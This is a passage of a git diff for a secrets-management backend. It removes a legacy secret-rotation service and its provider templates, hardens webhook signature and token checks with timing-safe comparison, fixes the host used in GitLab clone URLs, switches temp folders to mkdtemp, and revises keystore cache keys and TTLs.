"../permission/project-permission"; -import { TSecretRotationDALFactory } from "./secret-rotation-dal"; -import { TSecretRotationQueueFactory } from "./secret-rotation-queue"; -import { TSecretRotationEncData } from "./secret-rotation-queue/secret-rotation-queue-types"; -import { TCreateSecretRotationDTO, TDeleteDTO, TListByProjectIdDTO, TRestartDTO } from "./secret-rotation-types"; -import { rotationTemplates } from "./templates"; - -type TSecretRotationServiceFactoryDep = { - secretRotationDAL: TSecretRotationDALFactory; - projectDAL: Pick; - folderDAL: Pick; - secretDAL: Pick; - secretV2BridgeDAL: Pick; - licenseService: Pick; - permissionService: Pick; - secretRotationQueue: TSecretRotationQueueFactory; - projectBotService: Pick; - kmsService: Pick; -}; - -export type TSecretRotationServiceFactory = ReturnType; - -const ajv = new Ajv({ strict: false }); -export const secretRotationServiceFactory = ({ - secretRotationDAL, - permissionService, - secretRotationQueue, - licenseService, - projectDAL, - folderDAL, - secretDAL, - projectBotService, - secretV2BridgeDAL, - kmsService -}: TSecretRotationServiceFactoryDep) => { - const getProviderTemplates = async ({ - actor, - actorId, - actorOrgId, - actorAuthMethod, - projectId - }: TProjectPermission) => { - const { permission } = await permissionService.getProjectPermission({ - actor, - actorId, - projectId, - actorAuthMethod, - actorOrgId, - actionProjectType: ActionProjectType.SecretManager - }); - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretRotationActions.Read, - ProjectPermissionSub.SecretRotation - ); - - return { - custom: [], - providers: rotationTemplates - }; - }; - - const createRotation = async ({ - projectId, - actorId, - actor, - actorOrgId, - actorAuthMethod, - inputs, - outputs, - interval, - provider, - secretPath, - environment - }: TCreateSecretRotationDTO) => { - const { permission } = await permissionService.getProjectPermission({ - actor, - actorId, - projectId, - actorAuthMethod, - actorOrgId, - actionProjectType: ActionProjectType.SecretManager - }); - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretRotationActions.Read, - ProjectPermissionSub.SecretRotation - ); - - const folder = await folderDAL.findBySecretPath(projectId, environment, secretPath); - if (!folder) { - throw new NotFoundError({ - message: `Secret path with path '${secretPath}' not found in environment with slug '${environment}'` - }); - } - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretActions.Edit, - subject(ProjectPermissionSub.Secrets, { environment, secretPath }) - ); - - const project = await projectDAL.findById(projectId); - const shouldUseBridge = project.version === ProjectVersion.V3; - - if (shouldUseBridge) { - const selectedSecrets = await secretV2BridgeDAL.find({ - folderId: folder.id, - $in: { [`${TableName.SecretV2}.id` as "id"]: Object.values(outputs) } - }); - if (selectedSecrets.length !== Object.values(outputs).length) - throw new NotFoundError({ message: `Secrets not found in folder with ID '${folder.id}'` }); - const rotatedSecrets = selectedSecrets.filter(({ isRotatedSecret }) => isRotatedSecret); - if (rotatedSecrets.length) - throw new BadRequestError({ - message: `Selected secrets are already used for rotation: ${rotatedSecrets - .map((secret) => secret.key) - .join(", ")}` - }); - } else { - const selectedSecrets = await secretDAL.find({ - folderId: folder.id, - $in: { id: Object.values(outputs) } - }); - if (selectedSecrets.length !== Object.values(outputs).length) - throw new NotFoundError({ message: `Secrets not found in folder with ID '${folder.id}'` }); - } - - const plan = await licenseService.getPlan(project.orgId); - if (!plan.secretRotation) - throw new BadRequestError({ - message: "Failed to add secret rotation due to plan restriction. Upgrade plan to add secret rotation." - }); - - const selectedTemplate = rotationTemplates.find(({ name }) => name === provider); - if (!selectedTemplate) throw new NotFoundError({ message: `Provider with name '${provider}' not found` }); - const formattedInputs: Record = {}; - Object.entries(inputs).forEach(([key, value]) => { - const { type } = selectedTemplate.template.inputs.properties[key]; - if (type === "string") { - formattedInputs[key] = value; - return; - } - if (type === "integer") { - formattedInputs[key] = parseInt(value as string, 10); - return; - } - formattedInputs[key] = JSON.parse(value as string); - }); - // ensure input one follows the correct schema - const valid = ajv.validate(selectedTemplate.template.inputs, formattedInputs); - if (!valid) { - throw new BadRequestError({ message: ajv.errors?.[0].message }); - } - - const unencryptedData: Partial = { - inputs: formattedInputs, - creds: [] - }; - const { encryptor: secretManagerEncryptor } = await kmsService.createCipherPairWithDataKey({ - type: KmsDataKey.SecretManager, - projectId - }); - - const secretRotation = await secretRotationDAL.transaction(async (tx) => { - const doc = await secretRotationDAL.create( - { - provider, - secretPath, - interval, - envId: folder.envId, - encryptedRotationData: secretManagerEncryptor({ plainText: Buffer.from(JSON.stringify(unencryptedData)) }) - .cipherTextBlob - }, - tx - ); - let outputSecretMapping; - if (shouldUseBridge) { - outputSecretMapping = await secretRotationDAL.secretOutputV2InsertMany( - Object.entries(outputs).map(([key, secretId]) => ({ key, secretId, rotationId: doc.id })), - tx - ); - } else { - outputSecretMapping = await secretRotationDAL.secretOutputInsertMany( - Object.entries(outputs).map(([key, secretId]) => ({ key, secretId, rotationId: doc.id })), - tx - ); - } - return { ...doc, outputs: outputSecretMapping, environment: folder.environment }; - }); - await secretRotationQueue.addToQueue(); - return secretRotation; - }; - - const getByProjectId = async ({ actorId, projectId, actor, actorOrgId, actorAuthMethod }: TListByProjectIdDTO) => { - const { permission } = await permissionService.getProjectPermission({ - actor, - actorId, - projectId, - actorAuthMethod, - actorOrgId, - actionProjectType: ActionProjectType.SecretManager - }); - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretRotationActions.Read, - ProjectPermissionSub.SecretRotation - ); - const { botKey, shouldUseSecretV2Bridge } = await projectBotService.getBotKey(projectId); - if (shouldUseSecretV2Bridge) { - const docs = await secretRotationDAL.findSecretV2({ projectId }); - return docs; - } - - if (!botKey) throw new NotFoundError({ message: `Project bot not found for project with ID '${projectId}'` }); - const docs = await secretRotationDAL.find({ projectId }); - - return docs.map((el) => ({ - ...el, - outputs: el.outputs.map((output) => ({ - ...output, - secret: { - id: output.secret.id, - version: output.secret.version, - secretKey: crypto.encryption().symmetric().decrypt({ - ciphertext: output.secret.secretKeyCiphertext, - iv: output.secret.secretKeyIV, - tag: output.secret.secretKeyTag, - key: botKey, - keySize: SymmetricKeySize.Bits128 - }) - } - })) - })); - }; - - const restartById = async ({ actor, actorId, actorOrgId, actorAuthMethod, rotationId }: TRestartDTO) => { - const doc = await secretRotationDAL.findById(rotationId); - if (!doc) throw new NotFoundError({ message: `Rotation with ID '${rotationId}' not found` }); - - const project = await projectDAL.findById(doc.projectId); - const plan = await licenseService.getPlan(project.orgId); - if (!plan.secretRotation) - throw new BadRequestError({ - message: "Failed to add secret rotation due to plan restriction. Upgrade plan to add secret rotation." - }); - - const { permission } = await permissionService.getProjectPermission({ - actor, - actorId, - projectId: project.id, - actorAuthMethod, - actorOrgId, - actionProjectType: ActionProjectType.SecretManager - }); - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretRotationActions.Edit, - ProjectPermissionSub.SecretRotation - ); - await secretRotationQueue.removeFromQueue(doc.id, doc.interval); - await secretRotationQueue.addToQueue(); - return doc; - }; - - const deleteById = async ({ actor, actorId, actorOrgId, actorAuthMethod, rotationId }: TDeleteDTO) => { - const doc = await secretRotationDAL.findById(rotationId); - if (!doc) throw new NotFoundError({ message: `Rotation with ID '${rotationId}' not found` }); - - const { permission } = await permissionService.getProjectPermission({ - actor, - actorId, - projectId: doc.projectId, - actorAuthMethod, - actorOrgId, - actionProjectType: ActionProjectType.SecretManager - }); - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretRotationActions.Delete, - ProjectPermissionSub.SecretRotation - ); - const deletedDoc = await secretRotationDAL.transaction(async (tx) => { - const strat = await secretRotationDAL.deleteById(rotationId, tx); - return strat; - }); - await secretRotationQueue.removeFromQueue(deletedDoc.id, deletedDoc.interval); - return { ...doc, ...deletedDoc }; - }; - - return { - getProviderTemplates, - getByProjectId, - createRotation, - restartById, - deleteById - }; -}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-types.ts b/backend/src/ee/services/secret-rotation/secret-rotation-types.ts deleted file mode 100644 index 990bf3ecaab..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-types.ts +++ /dev/null @@ -1,20 +0,0 @@ -import { TProjectPermission } from "@app/lib/types"; - -export type TCreateSecretRotationDTO = { - secretPath: string; - environment: string; - interval: number; - provider: string; - inputs: Record; - outputs: Record; -} & TProjectPermission; - -export type TListByProjectIdDTO = TProjectPermission; - -export type TDeleteDTO = { - rotationId: string; -} & Omit; - -export type TRestartDTO = { - rotationId: string; -} & Omit; diff --git a/backend/src/ee/services/secret-rotation/templates/aws-iam.ts b/backend/src/ee/services/secret-rotation/templates/aws-iam.ts deleted file mode 100644 index d4506c26e91..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/aws-iam.ts +++ /dev/null @@ -1,21 +0,0 @@ -import { TAwsProviderSystems, TProviderFunctionTypes } from "./types"; - -export const AWS_IAM_TEMPLATE = { - type: TProviderFunctionTypes.AWS as const, - client: TAwsProviderSystems.IAM, - inputs: { - type: "object" as const, - properties: { - manager_user_access_key: { type: "string" as const }, - manager_user_secret_key: { type: "string" as const }, - manager_user_aws_region: { type: "string" as const }, - iam_username: { type: "string" as const } - }, - required: ["manager_user_access_key", "manager_user_secret_key", "manager_user_aws_region", "iam_username"], - additionalProperties: false - }, - outputs: { - iam_user_access_key: { type: "string" }, - iam_user_secret_key: { type: "string" } - } -}; diff --git a/backend/src/ee/services/secret-rotation/templates/index.ts b/backend/src/ee/services/secret-rotation/templates/index.ts deleted file mode 100644 index ce3ecd68724..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/index.ts +++ /dev/null @@ -1,46 +0,0 @@ -import { AWS_IAM_TEMPLATE } from "./aws-iam"; -import { MSSQL_TEMPLATE } from "./mssql"; -import { MYSQL_TEMPLATE } from "./mysql"; -import { POSTGRES_TEMPLATE } from "./postgres"; -import { SENDGRID_TEMPLATE } from "./sendgrid"; -import { TSecretRotationProviderTemplate } from "./types"; - -export const rotationTemplates: TSecretRotationProviderTemplate[] = [ - { - name: "sendgrid", - title: "Twilio Sendgrid", - image: "sendgrid.png", - description: "Rotate Twilio Sendgrid API keys", - template: SENDGRID_TEMPLATE - }, - { - name: "postgres", - title: "PostgreSQL", - image: "postgres.png", - description: "Rotate PostgreSQL/CockroachDB user credentials", - template: POSTGRES_TEMPLATE, - isDeprecated: true - }, - { - name: "mysql", - title: "MySQL", - image: "mysql.png", - description: "Rotate MySQL@7/MariaDB user credentials", - template: MYSQL_TEMPLATE - }, - { - name: "mssql", - title: "Microsoft SQL Server", - image: "mssqlserver.png", - description: "Rotate Microsoft SQL server user credentials", - template: MSSQL_TEMPLATE, - isDeprecated: true - }, - { - name: "aws-iam", - title: "AWS IAM", - image: "aws-iam.svg", - description: "Rotate AWS IAM User credentials", - template: AWS_IAM_TEMPLATE - } -]; diff --git a/backend/src/ee/services/secret-rotation/templates/mssql.ts b/backend/src/ee/services/secret-rotation/templates/mssql.ts deleted file mode 100644 index 30096590d9c..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/mssql.ts +++ /dev/null @@ -1,33 +0,0 @@ -import { TDbProviderClients, TProviderFunctionTypes } from "./types"; - -export const MSSQL_TEMPLATE = { - type: TProviderFunctionTypes.DB as const, - client: TDbProviderClients.MsSqlServer, - inputs: { - type: "object" as const, - properties: { - admin_username: { type: "string" as const }, - admin_password: { type: "string" as const }, - host: { type: "string" as const }, - database: { type: "string" as const, default: "master" }, - port: { type: "integer" as const, default: "1433" }, - username1: { - type: "string", - default: "infisical-sql-user1", - desc: "SQL Server login name that must be created at server level with a matching database user" - }, - username2: { - type: "string", - default: "infisical-sql-user2", - desc: "SQL Server login name that must be created at server level with a matching database user" - }, - ca: { type: "string", desc: "SSL certificate for db auth(string)" } - }, - required: ["admin_username", "admin_password", "host", "database", "username1", "username2", "port"], - additionalProperties: false - }, - outputs: { - db_username: { type: "string" }, - db_password: { type: "string" } - } -}; diff --git a/backend/src/ee/services/secret-rotation/templates/mysql.ts b/backend/src/ee/services/secret-rotation/templates/mysql.ts deleted file mode 100644 index 723560a3e8b..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/mysql.ts +++ /dev/null @@ -1,33 +0,0 @@ -import { TDbProviderClients, TProviderFunctionTypes } from "./types"; - -export const MYSQL_TEMPLATE = { - type: TProviderFunctionTypes.DB as const, - client: TDbProviderClients.MySql, - inputs: { - type: "object" as const, - properties: { - admin_username: { type: "string" as const }, - admin_password: { type: "string" as const }, - host: { type: "string" as const }, - database: { type: "string" as const }, - port: { type: "integer" as const, default: "3306" }, - username1: { - type: "string", - default: "infisical-sql-user1", - desc: "This user must be created in your database" - }, - username2: { - type: "string", - default: "infisical-sql-user2", - desc: "This user must be created in your database" - }, - ca: { type: "string", desc: "SSL certificate for db auth(string)" } - }, - required: ["admin_username", "admin_password", "host", "database", "username1", "username2", "port"], - additionalProperties: false - }, - outputs: { - db_username: { type: "string" }, - db_password: { type: "string" } - } -}; diff --git a/backend/src/ee/services/secret-rotation/templates/postgres.ts b/backend/src/ee/services/secret-rotation/templates/postgres.ts deleted file mode 100644 index c894631cb28..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/postgres.ts +++ /dev/null @@ -1,33 +0,0 @@ -import { TDbProviderClients, TProviderFunctionTypes } from "./types"; - -export const POSTGRES_TEMPLATE = { - type: TProviderFunctionTypes.DB as const, - client: TDbProviderClients.Pg as const, - inputs: { - type: "object" as const, - properties: { - admin_username: { type: "string" as const }, - admin_password: { type: "string" as const }, - host: { type: "string" as const }, - database: { type: "string" as const }, - port: { type: "integer" as const, default: "5432" }, - username1: { - type: "string", - default: "infisical-pg-user1", - desc: "This user must be created in your database" - }, - username2: { - type: "string", - default: "infisical-pg-user2", - desc: "This user must be created in your database" - }, - ca: { type: "string", desc: "SSL certificate for db auth(string)" } - }, - required: ["admin_username", "admin_password", "host", "database", "username1", "username2", "port"], - additionalProperties: false - }, - outputs: { - db_username: { type: "string" }, - db_password: { type: "string" } - } -}; diff --git a/backend/src/ee/services/secret-rotation/templates/sendgrid.ts b/backend/src/ee/services/secret-rotation/templates/sendgrid.ts deleted file mode 100644 index bfdda7606ce..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/sendgrid.ts +++ /dev/null @@ -1,62 +0,0 @@ -/* eslint-disable no-template-curly-in-string */ -import { TAssignOp, TProviderFunctionTypes } from "./types"; - -export const SENDGRID_TEMPLATE = { - type: TProviderFunctionTypes.HTTP as const, - inputs: { - type: "object" as const, - properties: { - admin_api_key: { type: "string" as const, desc: "Sendgrid admin api key to create new keys" }, - api_key_scopes: { - type: "array", - items: { type: "string" as const }, - desc: "Scopes for created tokens by rotation(Array)" - } - }, - required: ["admin_api_key", "api_key_scopes"], - additionalProperties: false - }, - outputs: { - api_key: { type: "string" } - }, - internal: { - api_key_id: { type: "string" } - }, - functions: { - set: { - url: "https://api.sendgrid.com/v3/api_keys", - method: "POST", - header: { - Authorization: "Bearer ${inputs.admin_api_key}" - }, - body: { - name: "infisical-${random | 16}", - scopes: { ref: "inputs.api_key_scopes" } - }, - setter: { - "outputs.api_key": { - assign: TAssignOp.JmesPath as const, - path: "api_key" - }, - "internal.api_key_id": { - assign: TAssignOp.JmesPath as const, - path: "api_key_id" - } - } - }, - remove: { - url: "https://api.sendgrid.com/v3/api_keys/${internal.api_key_id}", - header: { - Authorization: "Bearer ${inputs.admin_api_key}" - }, - method: "DELETE" - }, - test: { - url: "https://api.sendgrid.com/v3/api_keys/${internal.api_key_id}", - header: { - Authorization: "Bearer ${inputs.admin_api_key}" - }, - method: "GET" - } - } -}; diff --git a/backend/src/ee/services/secret-rotation/templates/types.ts b/backend/src/ee/services/secret-rotation/templates/types.ts deleted file mode 100644 index e2ad8384fe9..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/types.ts +++ /dev/null @@ -1,92 +0,0 @@ -export enum TProviderFunctionTypes { - HTTP = "http", - DB = "database", - AWS = "aws" -} - -export enum TDbProviderClients { - // postgres, cockroack db, amazon red shift - Pg = "pg", - // mysql and maria db - MySql = "mysql", - - MsSqlServer = "mssql", - OracleDB = "oracledb" -} - -export enum TAwsProviderSystems { - IAM = "iam" -} - -export enum TAssignOp { - Direct = "direct", - JmesPath = "jmesopath" -} - -export type TJmesPathAssignOp = { - assign: TAssignOp.JmesPath; - path: string; -}; - -export type TDirectAssignOp = { - assign: TAssignOp.Direct; - value: string; -}; - -export type TAssignFunction = TJmesPathAssignOp | TDirectAssignOp; - -export type THttpProviderFunction = { - url: string; - method: string; - header?: Record; - query?: Record; - body?: Record; - setter?: Record; - pre?: Record; -}; - -export type TSecretRotationProviderTemplate = { - name: string; - title: string; - image?: string; - description?: string; - template: THttpProviderTemplate | TDbProviderTemplate | TAwsProviderTemplate; - isDeprecated?: boolean; -}; - -export type THttpProviderTemplate = { - type: TProviderFunctionTypes.HTTP; - inputs: { - type: "object"; - properties: Record; - required?: string[]; - }; - outputs: Record; - functions: { - set: THttpProviderFunction; - remove?: THttpProviderFunction; - test: THttpProviderFunction; - }; -}; - -export type TDbProviderTemplate = { - type: TProviderFunctionTypes.DB; - client: TDbProviderClients; - inputs: { - type: "object"; - properties: Record; - required?: string[]; - }; - outputs: Record; -}; - -export type TAwsProviderTemplate = { - type: TProviderFunctionTypes.AWS; - client: TAwsProviderSystems; - inputs: { - type: "object"; - properties: Record; - required?: string[]; - }; - outputs: Record; -}; diff --git a/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts b/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts index 258fb8ac0e8..b1ec152b4b9 100644 --- a/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts +++ b/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts @@ -70,7 +70,14 @@ export const bitbucketSecretScanningService = ( hmac.update(bodyString); const calculatedSignature = hmac.digest("hex"); - if (calculatedSignature !== receivedSignature) { + const calculatedSignatureBuf = Buffer.from(calculatedSignature, "hex"); + const receivedSignatureBuf = Buffer.from(receivedSignature, "hex"); + + const isValid = + calculatedSignatureBuf.byteLength === receivedSignatureBuf.byteLength && + crypto.nativeCrypto.timingSafeEqual(calculatedSignatureBuf, receivedSignatureBuf); + + if (!isValid) { logger.error( `secretScanningV2PushEvent: Bitbucket - Invalid signature for webhook [dataSourceId=${dataSource.id}] [workspaceUuid=${repository.workspace.uuid}]` ); diff --git a/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-factory.ts b/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-factory.ts index a18359073b2..13c22d40303 100644 --- a/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-factory.ts +++ b/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-factory.ts @@ -42,18 +42,6 @@ import { TQueueGitLabResourceDiffScan } from "./gitlab-secret-scanning-types"; -const getMainDomain = (instanceUrl: string) => { - const url = new URL(instanceUrl); - const { hostname } = url; - const parts = hostname.split("."); - - if (parts.length >= 2) { - return parts.slice(-2).join("."); - } - - return hostname; -}; - export const GitLabSecretScanningFactory = ({ appConnectionDAL, kmsService }: TSecretScanningFactoryParams) => { const initialize: TSecretScanningFactoryInitialize< TGitLabDataSourceInput, @@ -272,8 +260,10 @@ export const GitLabSecretScanningFactory = ({ appConnectionDAL, kmsService }: TS throw new Error("Invalid GitLab project name"); } + const validatedHostname = new URL(instanceUrl).host; + await cloneRepository({ - cloneUrl: `https://${user.username}:${connection.credentials.accessToken}@${getMainDomain(instanceUrl)}/${resourceName}.git`, + cloneUrl: `https://${user.username}:${connection.credentials.accessToken}@${validatedHostname}/${resourceName}.git`, repoPath }); diff --git a/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-service.ts b/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-service.ts index bc669a2f5b0..1d7d13850c3 100644 --- a/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-service.ts +++ b/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-service.ts @@ -2,6 +2,7 @@ import { GitLabDataSourceScope } from "@app/ee/services/secret-scanning-v2/gitla import { TSecretScanningV2DALFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-dal"; import { SecretScanningDataSource } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums"; import { TSecretScanningV2QueueServiceFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-queue"; +import { crypto } from "@app/lib/crypto"; import { logger } from "@app/lib/logger"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { KmsDataKey } from "@app/services/kms/kms-types"; @@ -57,7 +58,13 @@ export const gitlabSecretScanningService = ( const credentials = JSON.parse(decryptedCredentials.toString()) as TGitLabDataSourceCredentials; - if (token !== credentials.token) { + const storedToken = Buffer.from(credentials.token, "utf8"); + const receivedToken = Buffer.from(token, "utf8"); + + const isValid = + storedToken.length === receivedToken.length && crypto.nativeCrypto.timingSafeEqual(storedToken, receivedToken); + + if (!isValid) { logger.error( `secretScanningV2PushEvent: GitLab - Invalid webhook token [dataSourceId=${dataSource.id}] [projectId=${payload.project.id}]` ); diff --git a/backend/src/ee/services/secret-scanning/secret-scanning-queue/secret-scanning-fns.ts b/backend/src/ee/services/secret-scanning/secret-scanning-queue/secret-scanning-fns.ts index 94d699c7fdb..ab561ae505b 100644 --- a/backend/src/ee/services/secret-scanning/secret-scanning-queue/secret-scanning-fns.ts +++ b/backend/src/ee/services/secret-scanning/secret-scanning-queue/secret-scanning-fns.ts @@ -1,25 +1,14 @@ import { Octokit } from "@octokit/rest"; import { execFile } from "child_process"; -import { mkdir, readFile, rm, writeFile } from "fs"; +import { readFile, rm, writeFile } from "fs"; +import { mkdtemp } from "fs/promises"; import { tmpdir } from "os"; import { join } from "path"; import { SecretMatch } from "./secret-scanning-queue-types"; export function createTempFolder(): Promise { - return new Promise((resolve, reject) => { - const tempDir = tmpdir(); - const tempFolderName = Math.random().toString(36).substring(2); - const tempFolderPath = join(tempDir, tempFolderName); - - mkdir(tempFolderPath, (err) => { - if (err) { - reject(err); - } else { - resolve(tempFolderPath); - } - }); - }); + return mkdtemp(join(tmpdir(), "infisical-scan-")); } export function writeTextToFile(filePath: string, content: string): Promise { diff --git a/backend/src/ee/services/trusted-ip/trusted-ip-service.ts b/backend/src/ee/services/trusted-ip/trusted-ip-service.ts index 6b9686e25b0..99343e0cc38 100644 --- a/backend/src/ee/services/trusted-ip/trusted-ip-service.ts +++ b/backend/src/ee/services/trusted-ip/trusted-ip-service.ts @@ -3,6 +3,8 @@ import { ForbiddenError } from "@casl/ability"; import { ActionProjectType } from "@app/db/schemas"; import { BadRequestError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TProjectDALFactory } from "@app/services/project/project-dal"; import { TLicenseServiceFactory } from "../license/license-service"; @@ -66,7 +68,9 @@ export const trustedIpServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Create, ProjectPermissionSub.IpAllowList); - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); const plan = await licenseService.getPlan(project.orgId); if (!plan.ipAllowlisting) throw new BadRequestError({ @@ -112,7 +116,9 @@ export const trustedIpServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Create, ProjectPermissionSub.IpAllowList); - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); const plan = await licenseService.getPlan(project.orgId); if (!plan.ipAllowlisting) throw new BadRequestError({ @@ -158,7 +164,9 @@ export const trustedIpServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Create, ProjectPermissionSub.IpAllowList); - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); const plan = await licenseService.getPlan(project.orgId); if (!plan.ipAllowlisting) throw new BadRequestError({ diff --git a/backend/src/keystore/keystore.ts b/backend/src/keystore/keystore.ts index 5e1cf9395b9..d44006c1c57 100644 --- a/backend/src/keystore/keystore.ts +++ b/backend/src/keystore/keystore.ts @@ -31,6 +31,7 @@ export const PgSqlLock = { IdentityLogin: (identityId: string, nonce: string) => pgAdvisoryLockHashText(`identity-login:${identityId}:${nonce}`), PamResourceSshCaInit: (resourceId: string) => pgAdvisoryLockHashText(`pam-resource-ssh-ca-init:${resourceId}`), CreateIdentity: (orgId: string) => pgAdvisoryLockHashText(`create-identity:${orgId}`), + CreateGateway: (orgId: string) => pgAdvisoryLockHashText(`create-gateway:${orgId}`), AccessSharedSecret: (sharedSecretId: string) => pgAdvisoryLockHashText(`access-shared-secret:${sharedSecretId}`), KmsOrgKeyCreation: (orgId: string) => pgAdvisoryLockHashText(`kms-org-key:${orgId}`), KmsOrgDataKeyCreation: (orgId: string) => pgAdvisoryLockHashText(`kms-org-data-key:${orgId}`), @@ -69,24 +70,17 @@ export const KeyStorePrefixes = { ActiveSSEConnections: (projectId: string, identityId: string, connectionId: string) => `sse-connections:${projectId}:${identityId}:${connectionId}` as const, - ProjectPermission: ( - projectId: string, - version: number, - actorType: string, - actorId: string, - actionProjectType: string - ) => `project-permission:${projectId}:${version}:${actorType}:${actorId}:${actionProjectType}` as const, - ProjectPermissionDalVersion: (projectId: string) => `project-permission:${projectId}:dal-version` as const, - UserProjectPermissionPattern: (userId: string) => `project-permission:*:*:USER:${userId}:*` as const, - IdentityProjectPermissionPattern: (identityId: string) => `project-permission:*:*:IDENTITY:${identityId}:*` as const, - GroupMemberProjectPermissionPattern: (projectId: string, groupId: string) => - `group-member-project-permission:${projectId}:${groupId}:*` as const, + ProjectPermissionMarker: (projectId: string, actorType: string, actorId: string, actionProjectType: string) => + `project-permission-marker:${projectId}:${actorType}:${actorId}:${actionProjectType}` as const, + ProjectPermissionData: (projectId: string, actorType: string, actorId: string, actionProjectType: string) => + `project-permission-data:${projectId}:${actorType}:${actorId}:${actionProjectType}` as const, PkiAcmeNonce: (nonce: string) => `pki-acme-nonce:${nonce}` as const, MfaSession: (mfaSessionId: string) => `mfa-session:${mfaSessionId}` as const, WebAuthnChallenge: (userId: string) => `webauthn-challenge:${userId}` as const, UserMfaLockoutLock: (userId: string) => `user-mfa-lockout-lock:${userId}` as const, UserMfaUnlockEmailSent: (userId: string) => `user-mfa-unlock-email-sent:${userId}` as const, + UsedTotpCode: (userId: string, code: string) => `used-totp-code:${userId}:${code}` as const, AiMcpServerOAuth: (sessionId: string) => `ai-mcp-server-oauth:${sessionId}` as const, @@ -104,21 +98,61 @@ export const KeyStorePrefixes = { TelemetryIdentifyIdentity: (dedupKey: string) => `telemetry-identify-identity:${dedupKey}` as const, TelemetryGroupIdentify: (orgId: string) => `telemetry-group-identify:${orgId}` as const, + TelemetryIdentify: (distinctId: string) => `telemetry-identify:${distinctId}` as const, SecretEtag: (projectId: string) => `secret-etag:${projectId}` as const, - RefreshTokenGrace: (sessionId: string) => `refresh-token-grace:${sessionId}` as const + + PamAwsIamAccessKeyId: (sessionId: string) => `pam-aws-iam-access-key-id:${sessionId}` as const, + + CertDashboardStats: (projectId: string) => `cert-dashboard-stats:${projectId}` as const, + CertActivityTrend: (projectId: string, range: string) => `cert-activity-trend:${projectId}:${range}` as const, + CertPqcTrend: (projectId: string, range: string) => `cert-pqc-trend:${projectId}:${range}` as const, + RefreshTokenGrace: (sessionId: string) => `refresh-token-grace:${sessionId}` as const, + InsightsCache: (projectId: string, endpoint: string) => `insights-cache:${projectId}:${endpoint}` as const, + + AdminConfig: "infisical-admin-cfg", + InvalidatingCache: "invalidating-cache", + SecretManagerCachePattern: "secret-manager:*", + AuditLogMigrationAlert: "audit-log-migration-alert-last-row-count", + LicenseCloudPlan: (orgId: string) => `infisical-cloud-plan-${orgId}` as const, + IdentityLockoutState: (identityId: string, authMethod: string, slug: string) => + `lockout:identity:${identityId}:${authMethod}:${slug}` as const, + IdentityLockoutStateByMethodPattern: (identityId: string, authMethod: string) => + `lockout:identity:${identityId}:${authMethod}:*` as const, + IdentityLockoutStatePattern: (identityId: string) => `lockout:identity:${identityId}:*` as const, + + TelemetryEvent: (event: string, bucketId: string, distinctId: string, uuid: string) => + `telemetry-event-${event}-${bucketId}-${distinctId}-${uuid}` as const, + TelemetryEventByBucketPattern: (event: string, bucketId: string) => `telemetry-event-${event}-${bucketId}-*` as const }; export const KeyStoreTtls = { SetSyncSecretIntegrationLastRunTimestampInSeconds: 60, SetSecretSyncLastRunTimestampInSeconds: 60, AccessTokenStatusUpdateInSeconds: 120, - ProjectPermissionCacheInSeconds: 300, // 5 minutes - ProjectPermissionDalVersionTtl: "15m", // Project permission DAL version TTL + ProjectPermissionMarkerTtlSeconds: 10, // 10 seconds - short-lived marker for fingerprint validation + ProjectPermissionDataTtlSeconds: 600, // 10 minutes - longer-lived data payload MfaSessionInSeconds: 300, // 5 minutes WebAuthnChallengeInSeconds: 300, // 5 minutes + UsedTotpCodeInSeconds: 120, // covers the full Β±30s acceptance window (window:1 β†’ 90s) with margin ProjectSSEConnectionTtlSeconds: 180, // Must be > heartbeat interval (60s) * 2 TelemetryIdentifyIdentityInSeconds: 86400, // 24 hours - RefreshTokenGraceInSeconds: 30 + RefreshTokenGraceInSeconds: 10, + InsightsCacheInSeconds: 300, // 5 minutes + AdminConfigInSeconds: 60, + InvalidatingCacheInSeconds: 1800, // 30 minutes max lock for cache invalidation job + AuditLogMigrationAlertInSeconds: 604800, // 